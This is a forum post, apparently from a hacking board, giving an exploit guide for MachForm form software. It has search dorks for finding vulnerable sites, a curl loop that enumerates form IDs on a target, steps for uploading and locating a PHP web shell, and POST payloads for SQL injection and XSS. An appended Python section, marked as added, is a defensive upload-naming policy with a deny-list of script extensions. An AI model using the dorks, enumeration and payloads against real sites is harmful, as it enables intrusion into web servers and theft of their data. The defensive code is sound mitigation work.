Shell Upload & SQL Injection

06-07-2013 08:57
#1
S4cuRiTy EneMy (Banned)

Dorks:

Code:
# Dork1: "Powered by MachForm" id=
# Dork2: formularios/view.php?id=
# Dork3: inurl:machform/view.php?id=
Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar
Summary:
========
1. Arbitrary file upload
2. MySQL Injection (Error based) and XSS


1. Arbitrary file upload:
=========================

...
...
if(!empty($uploaded_files)){
    foreach ($uploaded_files as $element_name){
        if(empty($form_review)){
            //move file and check for invalid file
            //note: the destination embeds the client-supplied $_FILES[...]['name'] with no
            //extension check, and the "<element>-<insert id>" prefix is predictable
            $destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}";
            if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
                $filename = mysql_real_escape_string($_FILES[$element_name]['name']);
                $query = "update ap_form_{$form_id} set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
                do_query($query);
            }
        }else{
            //for form with review enabled, append .tmp suffix to all uploaded files
            //move file and check for invalid file
            $destination_file = $input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}.tmp";
            if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
                $filename = mysql_real_escape_string($_FILES[$element_name]['name']);
                $query = "update ap_form_{$form_id}_review set $element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
                do_query($query);
            }

            if(!empty($uploaded_file_lookup[$element_name])){
                unset($uploaded_file_lookup[$element_name]);
            }
        }
    }
}
...
...

Exploit:

In the beginning, the hacker must aim at view.php, located at the root of the site; observing the lines inside the
mentioned file is a big lead to the disclosure of the vulnerability:

$input_array = ap_sanitize_input($_POST);
$submit_result = process_form($input_array);

These two lines call functions that lead to both the MySQL injection and the arbitrary file upload vulnerability. I'm
not going to audit the code; I will just illustrate the attack, which starts by applying a brute-force procedure to the
ID parameter so as to find a form containing a file upload field. It can be achieved with any program; I just issued a
Linux command that helped me find it properly:

seq 1 500 | xargs -I XX -P32 curl -s "http://target/view.php?id=XX" -o XX.out
grep 'type="file"' *.out

Afterwards, an HTML element followed by "for="(.*)"" must be specified; the picture below gives a better idea:

http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg

All that has to be done is uploading a PHP shell and trying to find its name on the server. The file will be uploaded
to the path:

http://target.com/data/form_[ID]/[element name]-[mysql_insert_id()].php

In the URL above, [ID] is gathered in the brute-force phase, [element name] is gathered by viewing the HTML source, and
[mysql_insert_id()] should be brute-forced again. Being relatively difficult, I've recorded a clip demonstrating what
I've said:

http://y-shahinzadeh.ir/tutorial/machform.rar

2. MySQL Injection (Error based) and XSS:
=========================================
...
...
$input_array = ap_sanitize_input($_POST);
...
...


Exploit (POST to view.php after finding HTML elements):

element_1=1&element_2='&element_3=1&form_id=11&submit=1
element_1=1&element_2=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28949236%29%3c%2fScRiPt%3e&element_3=1&form_id=11&submit=Enviar
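Added example, not part of the post and not MachForm code: a server-side upload naming policy, written in Python, that removes the two properties the upload excerpt in section 1 depends on, the verbatim client filename and the predictable "<element>-<insert id>" prefix. The allow-list of extensions is an assumption for a form-attachment feature; the logic is language-neutral and would be ported into the PHP handler where the destination path is built.

```python
import os
import re
import secrets

# Constructed allow-list for a form-attachment feature (assumption: the
# deployment only needs images and documents). Everything else is refused.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Extensions a web server may hand to a script engine. They are refused in
# any position, so "shell.php.jpg" is rejected along with "shell.php".
SCRIPT_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "cgi", "pl", "py", "sh", "asp", "aspx", "jsp", "htaccess",
}

# Client filenames must be plain ASCII, start with a letter or digit (which
# also rejects dotfiles such as .htaccess) and contain no path separators.
NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 ._-]*")


class UploadRejected(ValueError):
    """Raised when the client-supplied filename fails the policy."""


def safe_upload_name(client_filename, token=secrets.token_hex):
    """Return a server-chosen filename for an upload, or raise UploadRejected.

    The excerpt in the post reuses $_FILES[...]['name'] verbatim and prefixes
    it with the predictable "<element>-<insert id>"; here only a vetted
    extension survives and the rest of the name is 32 random hex characters,
    so a stored file can neither run as a script nor be found by enumeration.
    """
    # Drop any directory component the client sent, in either separator style.
    base = os.path.basename(client_filename.replace("\\", "/")).strip()
    if not NAME_RE.fullmatch(base):
        raise UploadRejected(f"filename outside the character policy: {base!r}")
    parts = base.lower().split(".")
    if len(parts) < 2:
        raise UploadRejected(f"filename has no extension: {base!r}")
    extensions = parts[1:]
    if any(ext in SCRIPT_EXTENSIONS for ext in extensions):
        raise UploadRejected(f"script extension refused: {base!r}")
    final_ext = extensions[-1]
    if final_ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension not in allow-list: {final_ext!r}")
    # 16 random bytes -> 32 hex characters. token is a parameter only so that
    # a test can substitute a fixed value; production code uses the default.
    return f"{token(16)}.{final_ext}"


def is_rejected(client_filename):
    """True when the policy refuses the name; convenience wrapper for checks."""
    try:
        safe_upload_name(client_filename)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    for name in ("report.pdf", "Photo.JPG", "shell.php", "shell.php.jpg",
                 "../../etc/evil.png", ".htaccess", "archive.exe"):
        try:
            print(f"{name:20} -> {safe_upload_name(name)}")
        except UploadRejected as exc:
            print(f"{name:20} -> rejected: {exc}")
```

The policy is deliberately an allow-list on the last extension plus a deny-list on every inner one: with an allow-list alone, "shell.php.jpg" passes, and servers configured with AddHandler-style mappings may still execute it. Storing the file under a directory the web server does not execute scripts from (or outside the document root, served through a download script) is the second half of the fix and is independent of the name chosen here.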


